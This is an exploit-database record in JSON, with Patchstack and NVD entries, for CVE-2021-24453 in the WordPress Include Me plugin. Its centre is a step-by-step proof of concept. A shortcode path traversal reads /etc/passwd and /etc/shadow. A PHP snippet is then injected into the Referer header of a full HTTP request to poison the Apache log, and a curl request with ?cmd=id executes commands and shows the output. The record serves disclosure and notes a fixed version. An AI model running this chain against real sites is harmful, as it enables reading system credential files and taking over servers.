The plugin is vulnerable to path traversal / local file inclusion, which can lead to Remote Code Execution (RCE) of the system due to log poisoning and therefore potentially a full compromise of the underlying structure
{"id": "WPEX-ID:78575072-4E04-4A8A-BAEC-F313CFFFE829", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Include Me <= 1.2.1 - Authenticated Remote Code Execution (RCE) via LFI log poisoning", "description": "The plugin is vulnerable to path traversal / local file inclusion, which can lead to Remote Code Execution (RCE) of the system due to log poisoning and therefore potentially a full compromise of the underlying structure\n", "published": "2021-06-21T00:00:00", "modified": "2021-07-11T10:24:35", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "wpvulndb", "references": [], "cvelist": ["CVE-2021-24453"], "immutableFields": [], "lastseen": "2021-09-14T23:16:02", "viewCount": 149, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24453"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:78575072-4E04-4A8A-BAEC-F313CFFFE829"]}], "rev": 4}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24453"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:78575072-4E04-4A8A-BAEC-F313CFFFE829"]}]}, "exploitation": null, "vulnersScore": 6.5}, "sourceData": "# RCE through chaining LFI with log poisoning\r\n\r\n# 1. Path Traversal / Local File Inclusion\r\n\r\n# Authenticate as any user, which can create blog posts on wordpress\r\n# for example, user with \"author\" role\r\n# create a new wordpress blog post\r\n# copy paste the following content on your blog post and visit your newly created page:\r\n\r\n[includeme file=\"/../../../../etc/passwd\" value=\"This is a basic path traversal poc\"]\r\n\r\n# contents of /etc/passwd will be displayed\r\n\r\n# 2. log poisoning\r\n\r\n# PoC was constructed with the LAMPP stack on Ubuntu 20.04 LTS. LAMPP has the apache2 error log file under /opt/lampp/logs/error_log, which will be used for demonstration purpose\r\n# however, please note that the default apache2 log can be found under /var/log/apache2/access.log\r\n# if you don't use the LAMPP stack, please use /var/log/apache2/access.log for the log poisoning part\r\n# reference: https://www.hackingarticles.in/apache-log-poisoning-through-lfi/\r\n\r\n# First, we are trying to open a restricted file like /etc/shadow to get an entry on /opt/lampp/logs/error_log. The \"error_log\" file is reflecting the HTTP \"referrer\" header, therefore we can inject arbitrary PHP functions into the \"referrer\" to get Remote Code Execution\r\n# open Burp Suite to intercept the request, append the payload to the \"referrer\" field\r\n# payload (without the quotes): \";<?php $_GET['cmd'];?>\"\r\n\r\nPOST /wordpress/wp-json/wp/v2/posts/116?_locale=user HTTP/1.1\r\nHost: localhost\r\nContent-Length: 303\r\nAccept: application/json, */*;q=0.1\r\nX-WP-Nonce: 7eb92e9895\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9\r\nX-HTTP-Method-Override: PUT\r\nContent-Type: application/json\r\nOrigin: http://localhost\r\nReferer: http://localhost/wordpress/wp-admin/post.php?post=116&action=edit;<?php $_GET['boss'];?>\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5d1e5a05b96398a14a61f963d4699ca9=BossisBack%7C1624379188%7CafC9qioiHNrTPEtqjzjgXuW96F0014a9TLOBz8b0phV%7C2e28994b4d0cd0574000263018f2f266877b3124fb65c91f63e49ea6df92b095; wp-settings-2=mfold%3Do; wp-settings-time-2=1624206389\r\ndnt: 1\r\nsec-gpc: 1\r\nConnection: close\r\n\r\n{\"id\":116,\"content\":\"<!-- wp:paragraph -->\\n<p>test page</p>\\n<!-- /wp:paragraph -->\\n\\n<!-- wp:shortcode -->\\n[includeme file=\\\"../../../../etc/shadow\\\" value=\\\"My name is Stefano\\\"]\\n<!-- /wp:shortcode -->\\n\\n<!-- wp:paragraph -->\\n<p></p>\\n<!-- /wp:paragraph -->\"}\r\n\r\n# on the same blog post, change the file back to\r\n\r\n[includeme file=\"../../../../opt/lampp/logs/error_log\" value=\"test\"]\r\n\r\n# now, the GET parameter \"cmd\" can be used to execute system commands\r\n# append \"?cmd=id\" to the URL of your published blog post\r\n# for example:\r\n\r\n$ curl http://localhost/wordpress/2021/06/20/myblogpost/?cmd=id\r\n\r\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n", "generation": 0, "_state": {"dependencies": 1646191046}}
{"patchstack": [{"lastseen": "2022-06-01T19:31:53", "description": "Path traversal and Local File Inclusion (LFI) vulnerability leading to Remote Code Execution (RCE) discovered by Mesut Cetin in WordPress Include Me plugin (versions <= 1.2.1).\n\n## Solution\n\n\r\n Update the WordPress Include Me plugin to the latest available version (at least 1.2.2)\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-21T00:00:00", "type": "patchstack", "title": "WordPress Include Me plugin <= 1.2.1 - Path traversal and Local File Inclusion (LFI) vulnerability leading to Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24453"], "modified": "2021-06-21T00:00:00", "id": "PATCHSTACK:E4BF860EEA6B5AF8AD2668F8535E2764", "href": "https://patchstack.com/database/vulnerability/include-me/wordpress-include-me-plugin-1-2-1-path-traversal-and-local-file-inclusion-lfi-vulnerability-leading-to-remote-code-execution-rce", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T14:54:58", "description": "The Include Me WordPress plugin through 1.2.1 is vulnerable to path traversal / local file inclusion, which can lead to Remote Code Execution (RCE) of the system due to log poisoning and therefore potentially a full compromise of the underlying structure", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T11:15:00", "type": "cve", "title": "CVE-2021-24453", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24453"], "modified": "2021-09-20T12:21:00", "cpe": ["cpe:/a:include_me_project:include_me:1.2.1"], "id": "CVE-2021-24453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24453", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:include_me_project:include_me:1.2.1:*:*:*:*:wordpress:*:*"]}], "wpvulndb": [{"lastseen": "2021-09-14T23:16:02", "description": "The plugin is vulnerable to path traversal / local file inclusion, which can lead to Remote Code Execution (RCE) of the system due to log poisoning and therefore potentially a full compromise of the underlying structure\n\n### PoC\n\n# RCE through chaining LFI with log poisoning # 1. Path Traversal / Local File Inclusion # Authenticate as any user, which can create blog posts on wordpress # for example, user with \"author\" role # create a new wordpress blog post # copy paste the following content on your blog post and visit your newly created page: [includeme file=\"/../../../../etc/passwd\" value=\"This is a basic path traversal poc\"] # contents of /etc/passwd will be displayed # 2. log poisoning # PoC was constructed with the LAMPP stack on Ubuntu 20.04 LTS. LAMPP has the apache2 error log file under /opt/lampp/logs/error_log, which will be used for demonstration purpose # however, please note that the default apache2 log can be found under /var/log/apache2/access.log # if you don't use the LAMPP stack, please use /var/log/apache2/access.log for the log poisoning part # reference: https://www.hackingarticles.in/apache-log-poisoning-through-lfi/ # First, we are trying to open a restricted file like /etc/shadow to get an entry on /opt/lampp/logs/error_log. The \"error_log\" file is reflecting the HTTP \"referrer\" header, therefore we can inject arbitrary PHP functions into the \"referrer\" to get Remote Code Execution # open Burp Suite to intercept the request, append the payload to the \"referrer\" field # payload (without the quotes): \";\" POST /wordpress/wp-json/wp/v2/posts/116?_locale=user HTTP/1.1 Host: localhost Content-Length: 303 Accept: application/json, */*;q=0.1 X-WP-Nonce: 7eb92e9895 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9 X-HTTP-Method-Override: PUT Content-Type: application/json Origin: http://localhost Referer: http://localhost/wordpress/wp-admin/post.php?post=116&action;=edit; Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5d1e5a05b96398a14a61f963d4699ca9=BossisBack%7C1624379188%7CafC9qioiHNrTPEtqjzjgXuW96F0014a9TLOBz8b0phV%7C2e28994b4d0cd0574000263018f2f266877b3124fb65c91f63e49ea6df92b095; wp-settings-2=mfold%3Do; wp-settings-time-2=1624206389 dnt: 1 sec-gpc: 1 Connection: close {\"id\":116,\"content\":\"\\n\n\ntest page\n\n\\n\\n\\n\\n[includeme file=\\\"../../../../etc/shadow\\\" value=\\\"My name is Stefano\\\"]\\n\\n\\n\\n\n\n\\n\"} # on the same blog post, change the file back to [includeme file=\"../../../../opt/lampp/logs/error_log\" value=\"test\"] # now, the GET parameter \"cmd\" can be used to execute system commands # append \"?cmd=id\" to the URL of your published blog post # for example: $ curl http://localhost/wordpress/2021/06/20/myblogpost/?cmd=id # uid=33(www-data) gid=33(www-data) groups=33(www-data) \n", "cvss3": {}, "published": "2021-06-21T00:00:00", "type": "wpvulndb", "title": "Include Me <= 1.2.1 - Authenticated Remote Code Execution (RCE) via LFI log poisoning", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24453"], "modified": "2021-07-11T10:24:35", "id": "WPVDB-ID:78575072-4E04-4A8A-BAEC-F313CFFFE829", "href": "https://wpscan.com/vulnerability/78575072-4e04-4a8a-baec-f313cfffe829", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}
Include Me <= 1.2.1 - Authenticated Remote Code Execution (RCE) via LFI log poisoning
